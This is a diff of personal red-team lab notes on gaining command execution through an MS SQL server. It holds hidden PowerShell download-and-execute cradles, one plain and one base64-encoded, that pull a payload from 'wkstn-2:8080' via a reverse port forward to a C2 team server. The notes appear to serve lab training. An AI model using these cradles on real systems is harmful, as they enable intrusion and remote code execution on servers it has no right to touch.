SlyJose/Hacking-Notes/Hacking-Vault/MSSQL Command Execution.md

 [+] started reverse port forward on 8080 to 127.0.0.1:80
 ```

-2) Check open ports in the target server, a useful one could be SMB.
-Host the payload on the team server and download the payload into the MS SQL Server:
+2) In this lab we know the mssql has SMB open, but check open ports in the target server.
+Host the payload on the team server.
+Then, download the payload into the MS SQL Server using this powershell command which will also execute it:

 `powershell -w hidden -c "iex (new-object net.webclient).downloadstring('http://wkstn-2:8080/b')"`
 Or
 `powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBrAHMAdABuAC0AMgA6ADgAMAA4ADAALwBiACcAKQA=`

+With this, the mssql server reaches to wkstn-2 for file "b", the traffic is routed to the C2, obtained, downloaded into the mssql server, and the payload is executed.

 ⚠ Experiment with using the [[Pivot Listener]] here instead of SMB.